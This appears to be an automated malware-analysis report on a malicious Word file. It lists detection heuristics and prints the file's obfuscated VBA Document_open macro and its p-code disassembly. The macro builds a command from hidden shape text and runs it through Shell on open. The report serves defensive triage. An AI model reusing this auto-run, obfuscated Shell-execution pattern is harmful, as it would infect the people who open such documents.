MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6769167-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6769167-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
ObscjdEzJjQCQcdCBucqizm = Hex(aloqjiGRBvzLCzMnPWMOzzvT) pPbHmYKz = Array(HUJfjdCfC, wEhjMZ, OLjUiN, Interaction!.Shell(wOPvhDEn, PSuRBPKO), YhBiAso) Select Case SVfLiAhuupZwTAaspS -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20379 bytes |
SHA-256: d1c9661354096162699277e49a91ed45794054be1e3b34f7c529b0bbc14a76fa |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
182 of 225 identifiers look randomly generated (e.g. 'AIvMBuLodrAipzPQzbGEfGjR') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "YtqLjTvLp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case AzdzBQiliKNPGSuFJbiWwi
Case 89190046
LoVDinfhYSJuVou = ChrB(145677283 / ChrB(216991154))
ccAHQYVBOEBXnVjU = MvaCrfjqoIzkVhIpoClIDX
Case 327185617
hZbfAioLAzhaGHlwUQcPV = 110561709
WtiwSwMkpzrVREAqJTokVAh = 227425690
End Select
Set QonnviMQjElSfVMnPrdPl = sTaSvhjXWMzRCJYzuP
FlAOYdwbwGIDTvzvUMcm = Hex(jIhZSOTCPRzOkjisECoz)
Select Case inULfMwrOvllMGOG
Case 224936059
naiiSbGwzQCvBHoNAD = ChrB(165987782 / ChrB(115914044))
cwQJfftENKqaQz = fwVsFjMjoSudzzGLhQR
Case 76755123
OYnwNrmFMVlKLhDhjMUP = 111696131
rlBwFGzIJzlwRYivssZ = 173051835
End Select
Set zJTlRCdAEwvNljBvRmf = DLlYNQfzkUcqqAt
hKoEVHFCplfrjAaGtTY = Hex(XvXAXdQkUFWlnZNGzbkvFj)
Select Case PZACkwDjXwpSGnbfFHVdKfi
Case 263655385
IYpwUBAIwFJpwGGBGdw = ChrB(103642931 / ChrB(112355426))
YbqZVwAjjvMbcaN = DwoKKiRqGBObDBfYKAzNF
Case 308133303
EHNVNcXifoVZBbGzqKzS = 134659235
ZfhPoRbbAiIRkCzMDOjXj = 257298964
End Select
Set cizDDIDGcLWihnwnGCEnr = kqDziGljzwlzFlrNX
wYjGOUPZFadUizqLtG = Hex(EizUsNXwkiMwsf)
Select Case SjDdCSzHqKpainYWnzX
Case 132368887
QjWHjEzEKdzNOWuvMQw = ChrB(264486312 / ChrB(238153318))
iUGAzNoRZscACwjWWOA = fjqNPRdaajYfor
Case 33469822
BfGjQtDGkNUwPq = 298157095
njswiskjjNrqUwMKriVrH = 106608647
End Select
Set mcjcBwfLjqnrHzGXIuaACB = moBKHkVBdXuGVvPi
EBHzjEFLkHMzjQkkOwoAm = Hex(aOoKUNslctLqvBuNGjv)
Select Case EkAwOrjLzYNinAbQZtYzjLi
Case 239387095
PkYmKBwXrXwnOjXzziS = ChrB(241172521 / ChrB(204103839))
JEECZkwLsGQXwHKZ = WOGvcicKMBwhcLzvCbUiIc
Case 89959225
ffpXqhQoZwvVYQhZbrM = 232095118
dQuQbwfqrduBiQwpFUflJHfP = 197064193
End Select
Set muuGQPidCOvGOlkwiS = UtAkkWXhzoWkim
JlwkMfWBNhuwFt = Hex(LYNOJdlJKkthjp)
Set QUKbwCw = Shapes("KjfWCXzASQ").TextFrame
Select Case oaUNMmcidoIdbsorzcLGlfVu
Case 112913231
BhbACAVfMPiMsFRvh = ChrB(101900633 / ChrB(116558480))
KcFWShilKIEawwlv = dlIHwfZJmkFpqzG
Case 189448874
FYbFiVWkUEKIQvU = 146533553
EdJCOzjNfwYwULwzqrMTBv = 111343951
End Select
Set XbbOAWokSCtcTDqburCYz = AtMKaEICnIMXfmWSMIIodR
VimAlZJssojbhCqwk = Hex(QPlQvYEEcitPJLibqjn)
Select Case TFQiAEvcZqjBzEcNCQK
Case 242566820
AIvMBuLodrAipzPQzbGEfGjR = ChrB(289026231 / ChrB(167377320))
MzBBnmcTzUWwKjnvzfXJ = MzFpDjStYdUcQzr
Case 183228871
NrMjSvbcwVsLklUQZzAwLk = 42466662
ZYrBWtkwTKSfwZuB = 195213837
End Select
Set GLahorAMqzqfddlC = tDaGCkvrZTpTAFw
wdvjrkzBKCkFojptt = Hex(BwDHDaipOYKsqusMfz)
Select Case riDWQwmXHjFwMt
Case 152624895
sTWQWRqZURmsFEAwwd = ChrB(257876513 / ChrB(80537029))
jscUVDDuIHTEXssMr = ZriCwLuSDjGCiGKGMauv
Case 8103053
nfLJSohMHmFANUldt = 105862297
DAXnGZNtQfRSvcKEwrp = 298143357
End Select
Set kqYUzisqVijiUwN = rFkEvRhqUJYDPmmEW
SKzTIqVCvwknaiwpHl = Hex(oKTIhAnKpajwcHA)
wOPvhDEn = QUKbwCw.TextRange.Text + MXLMCj + dPTjvKo + Nvjzfwc + tGMJIh + lVwLduQM + qfwQq + szwfvkw + RiDMEq
Select Case aMzHWAGBbcjUfjuTt
Case 122213427
sPpjJilQUipkmOBD = ChrB(69895429 / ChrB(233388435))
EjInMHLkuJLLzkCwzk = odkklSlsuFidjjWNZjbd
Case 182727157
tqGJXszjQBSjutUzWVaORfQj = 183754431
aWcPXHCrjtdcvtsKocK = 18157755
End Select
Set ctaMGCMjNaahvRcHBdLiDJ = WuahWHqnVZnzcCCREpL
TDuAbPCnwzXlTTDRjU = Hex(YXmFIHUAFwMGpsnHSzZGGEC)
Select Case CcSHwwNSdVOSdiPf
Case 247328320
YrbJWrnqlQFYPtNHu = ChrB(45796014 / ChrB(265977094))
rutvwBcnLsFhwhSPltFbUHLw = EFUFWnIqmZizjLVO
Case 3578947
tLXciazWBBNijjzitvHi = 266668606
zqJHoSEijMTbRk = 274983364
End Select
Set XuHAlGdIquAwRZHSroO = TamfRTRAKHRMsRYNaoSq
ARtRGRKFBkcWJIzH = Hex(jSpdzidnFzBtsDWXTSIs)
Select Case wDXczWQtSdEDPiYidc
Case 269994695
qBzZznsUnMNGzkJZKfvGk = ChrB(323324410 / ChrB(44913583))
jXJLhsRwJWjvDzdMdwGFP = DfUwYzhiwtuNtbdhmvvOwdEO
Case 143534579
CidoqBVhUiqiTTRb = 158566249
AqEBjvJLJABabFcLvwEJCs = 290505363
End Select
Set HzrEbbzVFROfHAzi = fsUjtClFIYSWOjHwstjE
jhDfVJrzDuzWiWA = Hex(fOwFzTDfwqiGhPGPia)
Select Case wVWjPZcjJlwkBpirsSmrijk
Case 128980079
PYcjiajXNjkcHb = ChrB(103284956 / ChrB(250816862))
OijzmVFFdYnwMRlCjzAA = fKPNnGzPlrWFCR
Case 40520798
FdCWbACvaBRzZabOlcjUU = 236554173
PHpshQrJAiSbWwiciITmmowq = 75451536
End Select
Set ITaimPVinOlIUfjrR = GzFQHzELBzMaJzjRIX
SsDFsLPqWnnCuXdjMKrMa = Hex(aOXRMEmbDXMIzbDtNErJ)
Select Case mFhEnowFfjdjBKdr
Case 279276632
QoFbqlinoKomMsRHKhmNIOE = ChrB(150716752 / ChrB(134187910))
vmGkdJJRtaFLOvWAzmQ = TlStAvEclCjiGOqvjDjidvz
Case 287168170
wTrrHOSGcJJUMk = 227281508
jjrqXEAFaTwFlPX = 253639631
End Select
Set sBbMldnRciFjbTTzZwP = BiuTlRoRMUNlXuU
GsuDDYuZuZzzdHMSIiZNH = Hex(bUoWEHRTJhzkrjB)
Const PSuRBPKO = 0
Select Case QMsKtObzXIwMzwzowobijSY
Case 193783890
NCXOzUnlkzFIhWRpzBojbn = ChrB(120763056 / ChrB(16901749))
kLYsKzoOXjLDiYnJ = MzufORJpjQjwLZkVCOJ
Case 96937067
aBRtKqGlRdBWzaVIjVtODij = 31158593
LGbijJivimvcmEbDD = 99597701
End Select
Set iZMzPMVsPAovUNbwkfDkUW = RoZjtQRLAPtWszHLVKQ
vtqaPLGrYziSLwvKp = Hex(cbwoojbqjwcTiZDIjXwz)
Select Case nzwbqciLLlNwfQrZITRJ
Case 97501214
GphuwrETpaDEkBjO = ChrB(197336255 / ChrB(127768780))
EAFzqDFRYGfjwRZsHuw = mHsvntafpstpwjKMArqr
Case 279651941
jMKqEmLIZUhnmzIKJzc = 173158683
fNplPHMsPDEpNaflzoo = 135653475
End Select
Set TZIKwMEqhtOQwBzUFpiwQ = RczZWdYMIoFuLnha
uIBhJqZOZjRszJWQJ = Hex(fNWqaRVkaKDpLmi)
Select Case wtrOraRoArGCMhifLHbj
Case 238906518
YpXtEQNwsmNhIXNALrGX = ChrB(273856755 / ChrB(159479943))
OKUFQpYOOvQVBrwVAbCzUp = ZKRKvjaMqACIikLwIUYw
Case 249384383
CMINWFwnZRYfuuzidiojZVw = 230773856
lpitiwrshIFChNUPD = 176910303
End Select
Set jDpQwdqtKCThNZwkQRtuU = mNmucwQTUVuNzMvZiPoDj
ObscjdEzJjQCQcdCBucqizm = Hex(aloqjiGRBvzLCzMnPWMOzzvT)
pPbHmYKz = Array(HUJfjdCfC, wEhjMZ, OLjUiN, Interaction!.Shell(wOPvhDEn, PSuRBPKO), YhBiAso)
Select Case SVfLiAhuupZwTAaspS
Case 20826049
DkDVORoiKiMbHBM = ChrB(262731102 / ChrB(297641105))
iDrQEfOodnTDMaWOPiS = zMMwkPczpSnnzRk
Case 342177914
njYHZoAPHSlEsliVj = 177278202
qtjoCQwKzjDvqWzbCu = 9643778
End Select
Set XMidwqszjJRPqOJVGrV = bdAjDXvisJbbiDziKDsMXBi
OnEbNiVLYJwuMzZZuKEWhq = Hex(nQfLDzITZzKVPSTUOoQCY)
End Sub
' Processing file: /tmp/qstore_60io860y
' ===============================================================================
' Module streams:
' Macros/VBA/YtqLjTvLp - 11596 bytes
' Line #0:
' FuncDefn (Private Sub Document_open())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld AzdzBQiliKNPGSuFJbiWwi
' SelectCase
' Line #3:
' LitDI4 0xEE9E 0x0550
' Case
' CaseDone
' Line #4:
' LitDI4 0xDBE3 0x08AE
' LitDI4 0x05B2 0x0CEF
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St LoVDinfhYSJuVou
' Line #5:
' Ld MvaCrfjqoIzkVhIpoClIDX
' St ccAHQYVBOEBXnVjU
' Line #6:
' LitDI4 0x74D1 0x1380
' Case
' CaseDone
' Line #7:
' LitDI4 0x09AD 0x0697
' St hZbfAioLAzhaGHlwUQcPV
' Line #8:
' LitDI4 0x3D9A 0x0D8E
' St WtiwSwMkpzrVREAqJTokVAh
' Line #9:
' EndSelect
' Line #10:
' SetStmt
' Ld sTaSvhjXWMzRCJYzuP
' Set QonnviMQjElSfVMnPrdPl
' Line #11:
' Ld jIhZSOTCPRzOkjisECoz
' ArgsLd Hex 0x0001
' St FlAOYdwbwGIDTvzvUMcm
' Line #12:
' Ld inULfMwrOvllMGOG
' SelectCase
' Line #13:
' LitDI4 0x407B 0x0D68
' Case
' CaseDone
' Line #14:
' LitDI4 0xC5C6 0x09E4
' LitDI4 0xB53C 0x06E8
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St naiiSbGwzQCvBHoNAD
' Line #15:
' Ld fwVsFjMjoSudzzGLhQR
' St cwQJfftENKqaQz
' Line #16:
' LitDI4 0x30B3 0x0493
' Case
' CaseDone
' Line #17:
' LitDI4 0x5903 0x06A8
' St OYnwNrmFMVlKLhDhjMUP
' Line #18:
' LitDI4 0x8FBB 0x0A50
' St rlBwFGzIJzlwRYivssZ
' Line #19:
' EndSelect
' Line #20:
' SetStmt
' Ld DLlYNQfzkUcqqAt
' Set zJTlRCdAEwvNljBvRmf
' Line #21:
' Ld XvXAXdQkUFWlnZNGzbkvFj
' ArgsLd Hex 0x0001
' St hKoEVHFCplfrjAaGtTY
' Line #22:
' Ld PZACkwDjXwpSGnbfFHVdKfi
' SelectCase
' Line #23:
' LitDI4 0x0FD9 0x0FB7
' Case
' CaseDone
' Line #24:
' LitDI4 0x7733 0x062D
' LitDI4 0x6862 0x06B2
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St IYpwUBAIwFJpwGGBGdw
' Line #25:
' Ld DwoKKiRqGBObDBfYKAzNF
' St YbqZVwAjjvMbcaN
' Line #26:
' LitDI4 0xBDB7 0x125D
' Case
' CaseDone
' Line #27:
' LitDI4 0xBCA3 0x0806
' St EHNVNcXifoVZBbGzqKzS
' Line #28:
' LitDI4 0x1214 0x0F56
' St ZfhPoRbbAiIRkCzMDOjXj
' Line #29:
' EndSelect
' Line #30:
' SetStmt
' Ld kqDziGljzwlzFlrNX
' Set cizDDIDGcLWihnwnGCEnr
' Line #31:
' Ld EizUsNXwkiMwsf
' ArgsLd Hex 0x0001
' St wYjGOUPZFadUizqLtG
' Line #32:
' Ld SjDdCSzHqKpainYWnzX
' SelectCase
' Line #33:
' LitDI4 0xC9F7 0x07E3
' Case
' CaseDone
' Line #34:
' LitDI4 0xBDA8 0x0FC3
' LitDI4 0xEE66 0x0E31
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St QjWHjEzEKdzNOWuvMQw
' Line #35:
' Ld fjqNPRdaajYfor
' St iUGAzNoRZscACwjWWOA
' Line #36:
' LitDI4 0xB57E 0x01FE
' Case
' CaseDone
' Line #37:
' LitDI4 0x8427 0x11C5
' St BfGjQtDGkNUwPq
' Line #38:
' LitDI4 0xB807 0x065A
' St njswiskjjNrqUwMKriVrH
' Line #39:
' EndSelect
' Line #40:
' SetStmt
' Ld moBKHkVBdXuGVvPi
' Set mcjcBwfLjqnrHzGXIuaACB
' Line #41:
' Ld aOoKUNslctLqvBuNGjv
' ArgsLd Hex 0x0001
' St EBHzjEFLkHMzjQkkOwoAm
' Line #42:
' Ld EkAwOrjLzYNinAbQZtYzjLi
' SelectCase
' Line #43:
' LitDI4 0xC1D7 0x0E44
' Case
' CaseDone
' Line #44:
' LitDI4 0x0029 0x0E60
' LitDI4 0x609F 0x0C2A
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St PkYmKBwXrXwnOjXzziS
' Line #45:
' Ld WOGvcicKMBwhcLzvCbUiIc
' St JEECZkwLsGQXwHKZ
' Line #46:
' LitDI4 0xAB39 0x055C
' Case
' CaseDone
' Line #47:
' LitDI4 0x7D8E 0x0DD5
' St ffpXqhQoZwvVYQhZbrM
' Line #48:
' LitDI4 0xF601 0x0BBE
' St dQuQbwfqrduBiQwpFUflJHfP
' Line #49:
' EndSelect
' Line #50:
' SetStmt
' Ld UtAkkWXhzoWkim
' Set muuGQPidCOvGOlkwiS
' Line #51:
' Ld LYNOJdlJKkthjp
' ArgsLd Hex 0x0001
' St JlwkMfWBNhuwFt
' Line #52:
' SetStmt
' LitStr 0x000A "KjfWCXzASQ"
' ArgsLd Shapes 0x0001
' MemLd TextFrame
' Set QUKbwCw
' Line #53:
' Ld oaUNMmcidoIdbsorzcLGlfVu
' SelectCase
' Line #54:
' LitDI4 0xEB4F 0x06BA
' Case
' CaseDone
' Line #55:
' LitDI4 0xE159 0x0612
' LitDI4 0x8A90 0x06F2
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St BhbACAVfMPiMsFRvh
' Line #56:
' Ld dlIHwfZJmkFpqzG
' St KcFWShilKIEawwlv
' Line #57:
' LitDI4 0xC2AA 0x0B4A
' Case
' CaseDone
' Line #58:
' LitDI4 0xECB1 0x08BB
' St FYbFiVWkUEKIQvU
' Line #59:
' LitDI4 0xF94F 0x06A2
' St EdJCOzjNfwYwULwzqrMTBv
' Line #60:
' EndSelect
' Line #61:
' SetStmt
' Ld AtMKaEICnIMXfmWSMIIodR
' Set XbbOAWokSCtcTDqburCYz
' Line #62:
' Ld QPlQvYEEcitPJLibqjn
' ArgsLd Hex 0x0001
' St VimAlZJssojbhCqwk
' Line #63:
' Ld TFQiAEvcZqjBzEcNCQK
' SelectCase
' Line #64:
' LitDI4 0x46A4 0x0E75
' Case
' CaseDone
' Line #65:
' LitDI4 0x30B7 0x113A
' LitDI4 0xF9A8 0x09F9
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St AIvMBuLodrAipzPQzbGEfGjR
' Line #66:
' Ld MzFpDjStYdUcQzr
' St MzBBnmcTzUWwKjnvzfXJ
' Line #67:
' LitDI4 0xD9C7 0x0AEB
' Case
' CaseDone
' Line #68:
' LitDI4 0xFD66 0x0287
' St NrMjSvbcwVsLklUQZzAwLk
' Line #69:
' LitDI4 0xBA0D 0x0BA2
' St ZYrBWtkwTKSfwZuB
' Line #70:
' EndSelect
' Line #71:
' SetStmt
' Ld tDaGCkvrZTpTAFw
' Set GLahorAMqzqfddlC
' Line #72:
' Ld BwDHDaipOYKsqusMfz
' ArgsLd Hex 0x0001
' St wdvjrkzBKCkFojptt
' Line #73:
' Ld riDWQwmXHjFwMt
' SelectCase
' Line #74:
' LitDI4 0xDEFF 0x0918
' Case
' CaseDone
' Line #75:
' LitDI4 0xE221 0x0F5E
' LitDI4 0xE5C5 0x04CC
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St sTWQWRqZURmsFEAwwd
' Line #76:
' Ld ZriCwLuSDjGCiGKGMauv
' St jscUVDDuIHTEXssMr
' Line #77:
' LitDI4 0xA48D 0x007B
' Case
' CaseDone
' Line #78:
' LitDI4 0x5499 0x064F
' St nfLJSohMHmFANUldt
' Line #79:
' LitDI4 0x4E7D 0x11C5
' St DAXnGZNtQfRSvcKEwrp
' Line #80:
' EndSelect
' Line #81:
' SetStmt
' Ld rFkEvRhqUJYDPmmEW
' Set kqYUzisqVijiUwN
' Line #82:
' Ld oKTIhAnKpajwcHA
' ArgsLd Hex 0x0001
' St SKzTIqVCvwknaiwpHl
' Line #83:
' Ld QUKbwCw
' MemLd TextRange
' MemLd Text
' Ld MXLMCj
' Add
' Ld dPTjvKo
' Add
' Ld Nvjzfwc
' Add
' Ld tGMJIh
' Add
' Ld lVwLduQM
' Add
' Ld qfwQq
' Add
' Ld szwfvkw
' Add
' Ld RiDMEq
' Add
' St wOPvhDEn
' Line #84:
' Ld aMzHWAGBbcjUfjuTt
' SelectCase
' Line #85:
' LitDI4 0xD433 0x0748
' Case
' CaseDone
' Line #86:
' LitDI4 0x8505 0x042A
' LitDI4 0x3993 0x0DE9
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St sPpjJilQUipkmOBD
' Line #87:
' Ld odkklSlsuFidjjWNZjbd
' St EjInMHLkuJLLzkCwzk
' Line #88:
' LitDI4 0x31F5 0x0AE4
' Case
' CaseDone
' Line #89:
' LitDI4 0xDEBF 0x0AF3
' St tqGJXszjQBSjutUzWVaORfQj
' Line #90:
' LitDI4 0x10BB 0x0115
' St aWcPXHCrjtdcvtsKocK
' Line #91:
' EndSelect
' Line #92:
' SetStmt
' Ld WuahWHqnVZnzcCCREpL
' Set ctaMGCMjNaahvRcHBdLiDJ
' Line #93:
' Ld YXmFIHUAFwMGpsnHSzZGGEC
' ArgsLd Hex 0x0001
' St TDuAbPCnwzXlTTDRjU
' Line #94:
' Ld CcSHwwNSdVOSdiPf
' SelectCase
' Line #95:
' LitDI4 0xEE40 0x0EBD
' Case
' CaseDone
' Line #96:
' LitDI4 0xCAAE 0x02BA
' LitDI4 0x7D06 0x0FDA
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St YrbJWrnqlQFYPtNHu
' Line #97:
' Ld EFUFWnIqmZizjLVO
' St rutvwBcnLsFhwhSPltFbUHLw
' Line #98:
' LitDI4 0x9C43 0x0036
' Case
' CaseDone
' Line #99:
' LitDI4 0x0A3E 0x0FE5
' St tLXciazWBBNijjzitvHi
' Line #100:
' LitDI4 0xE9C4 0x1063
' St zqJHoSEijMTbRk
' Line #101:
' EndSelect
' Line #102:
' SetStmt
' Ld TamfRTRAKHRMsRYNaoSq
' Set XuHAlGdIquAwRZHSroO
' Line #103:
' Ld jSpdzidnFzBtsDWXTSIs
' ArgsLd Hex 0x0001
' St ARtRGRKFBkcWJIzH
' Line #104:
' Ld wDXczWQtSdEDPiYidc
' SelectCase
' Line #105:
' LitDI4 0xCAC7 0x1017
' Case
' CaseDone
' Line #106:
' LitDI4 0x89FA 0x1345
' LitDI4 0x53AF 0x02AD
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St qBzZznsUnMNGzkJZKfvGk
' Line #107:
' Ld DfUwYzhiwtuNtbdhmvvOwdEO
' St jXJLhsRwJWjvDzdMdwGFP
' Line #108:
' LitDI4 0x29F3 0x088E
' Case
' CaseDone
' Line #109:
' LitDI4 0x8769 0x0973
' St CidoqBVhUiqiTTRb
' Line #110:
' LitDI4 0xC293 0x1150
' St AqEBjvJLJABabFcLvwEJCs
' Line #111:
' EndSelect
' Line #112:
' SetStmt
' Ld fsUjtClFIYSWOjHwstjE
' Set HzrEbbzVFROfHAzi
' Line #113:
' Ld fOwFzTDfwqiGhPGPia
' ArgsLd Hex 0x0001
' St jhDfVJrzDuzWiWA
' Line #114:
' Ld wVWjPZcjJlwkBpirsSmrijk
' SelectCase
' Line #115:
' LitDI4 0x146F 0x07B0
' Case
' CaseDone
' Line #116:
' LitDI4 0x00DC 0x0628
' LitDI4 0x295E 0x0EF3
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St PYcjiajXNjkcHb
' Line #117:
' Ld fKPNnGzPlrWFCR
' St OijzmVFFdYnwMRlCjzAA
' Line #118:
' LitDI4 0x4C5E 0x026A
' Case
' CaseDone
' Line #119:
' LitDI4 0x87BD 0x0E19
' St FdCWbACvaBRzZabOlcjUU
' Line #120:
' LitDI4 0x4C90 0x047F
' St PHpshQrJAiSbWwiciITmmowq
' Line #121:
' EndSelect
' Line #122:
' SetStmt
' Ld GzFQHzELBzMaJzjRIX
' Set ITaimPVinOlIUfjrR
' Line #123:
' Ld aOXRMEmbDXMIzbDtNErJ
' ArgsLd Hex 0x0001
' St SsDFsLPqWnnCuXdjMKrMa
' Line #124:
' Ld mFhEnowFfjdjBKdr
' SelectCase
' Line #125:
' LitDI4 0x6C58 0x10A5
' Case
' CaseDone
' Line #126:
' LitDI4 0xC150 0x08FB
' LitDI4 0x8B86 0x07FF
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St QoFbqlinoKomMsRHKhmNIOE
' Line #127:
' Ld TlStAvEclCjiGOqvjDjidvz
' St vmGkdJJRtaFLOvWAzmQ
' Line #128:
' LitDI4 0xD6AA 0x111D
' Case
' CaseDone
' Line #129:
' LitDI4 0x0A64 0x0D8C
' St wTrrHOSGcJJUMk
' Line #130:
' LitDI4 0x3BCF 0x0F1E
' St jjrqXEAFaTwFlPX
' Line #131:
' EndSelect
' Line #132:
' SetStmt
' Ld BiuTlRoRMUNlXuU
' Set sBbMldnRciFjbTTzZwP
' Line #133:
' Ld bUoWEHRTJhzkrjB
' ArgsLd Hex 0x0001
' St GsuDDYuZuZzzdHMSIiZNH
' Line #134:
' Dim (Const)
' LitDI2 0x0000
' VarDefn PSuRBPKO
' Line #135:
' Ld QMsKtObzXIwMzwzowobijSY
' SelectCase
' Line #136:
' LitDI4 0xE852 0x0B8C
' Case
' CaseDone
' Line #137:
' LitDI4 0xB2B0 0x0732
' LitDI4 0xE675 0x0101
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St NCXOzUnlkzFIhWRpzBojbn
' Line #138:
' Ld MzufORJpjQjwLZkVCOJ
' St kLYsKzoOXjLDiYnJ
' Line #139:
' LitDI4 0x246B 0x05C7
' Case
' CaseDone
' Line #140:
' LitDI4 0x7141 0x01DB
' St aBRtKqGlRdBWzaVIjVtODij
' Line #141:
' LitDI4 0xBD85 0x05EF
' St LGbijJivimvcmEbDD
' Line #142:
' EndSelect
' Line #143:
' SetStmt
' Ld RoZjtQRLAPtWszHLVKQ
' Set iZMzPMVsPAovUNbwkfDkUW
' Line #144:
' Ld cbwoojbqjwcTiZDIjXwz
' ArgsLd Hex 0x0001
' St vtqaPLGrYziSLwvKp
' Line #145:
' Ld nzwbqciLLlNwfQrZITRJ
' SelectCase
' Line #146:
' LitDI4 0xC01E 0x05CF
' Case
' CaseDone
' Line #147:
' LitDI4 0x1CBF 0x0BC3
' LitDI4 0x98CC 0x079D
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St GphuwrETpaDEkBjO
' Line #148:
' Ld mHsvntafpstpwjKMArqr
' St EAFzqDFRYGfjwRZsHuw
' Line #149:
' LitDI4 0x2665 0x10AB
' Case
' CaseDone
' Line #150:
' LitDI4 0x311B 0x0A52
' St jMKqEmLIZUhnmzIKJzc
' Line #151:
' LitDI4 0xE863 0x0815
' St fNplPHMsPDEpNaflzoo
' Line #152:
' EndSelect
' Line #153:
' SetStmt
' Ld RczZWdYMIoFuLnha
' Set TZIKwMEqhtOQwBzUFpiwQ
' Line #154:
' Ld fNWqaRVkaKDpLmi
' ArgsLd Hex 0x0001
' St uIBhJqZOZjRszJWQJ
' Line #155:
' Ld wtrOraRoArGCMhifLHbj
' SelectCase
' Line #156:
' LitDI4 0x6C96 0x0E3D
' Case
' CaseDone
' Line #157:
' LitDI4 0xB8F3 0x1052
' LitDI4 0x7887 0x0981
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St YpXtEQNwsmNhIXNALrGX
' Line #158:
' Ld ZKRKvjaMqACIikLwIUYw
' St OKUFQpYOOvQVBrwVAbCzUp
' Line #159:
' LitDI4 0x4DBF 0x0EDD
' Case
' CaseDone
' Line #160:
' LitDI4 0x5460 0x0DC1
' St CMINWFwnZRYfuuzidiojZVw
' Line #161:
' LitDI4 0x6FDF 0x0A8B
' St lpitiwrshIFChNUPD
' Line #162:
' EndSelect
' Line #163:
' SetStmt
' Ld jDpQwdqtKCThNZwkQRtuU
' Set jDpQwdqtKCThNZwkQRtuU
' Line #164:
' Ld ObscjdEzJjQCQcdCBucqizm
' ArgsLd Hex 0x0001
' St mNmucwQTUVuNzMvZiPoDj
' Line #165:
' Ld pPbHmYKz
' Ld HUJfjdCfC
' Ld wEhjMZ
' Ld wOPvhDEn
' Ld PSuRBPKO
' Ld OLjUiN!
' ArgsMemLd Interaction 0x0002
' Ld Shell
' ArgsArray Array 0x0005
' St aloqjiGRBvzLCzMnPWMOzzvT
' Line #166:
' Ld YhBiAso
' SelectCase
' Line #167:
' LitDI4 0xC7C1 0x013D
' Case
' CaseDone
' Line #168:
' LitDI4 0xF55E 0x0FA8
' LitDI4 0xA491 0x11BD
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St SVfLiAhuupZwTAaspS
' Line #169:
' Ld iDrQEfOodnTDMaWOPiS
' St DkDVORoiKiMbHBM
' Line #170:
' LitDI4 0x387A 0x1465
' Case
' CaseDone
' Line #171:
' LitDI4 0x0CFA 0x0A91
' St zMMwkPczpSnnzRk
' Line #172:
' LitDI4 0x2702 0x0093
' St njYHZoAPHSlEsliVj
' Line #173:
' EndSelect
' Line #174:
' SetStmt
' Ld XMidwqszjJRPqOJVGrV
' Set qtjoCQwKzjDvqWzbCu
' Line #175:
' Ld OnEbNiVLYJwuMzZZuKEWhq
' ArgsLd Hex 0x0001
' St bdAjDXvisJbbiDziKDsMXBi
' Line #176:
' EndSub
' Line #177:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.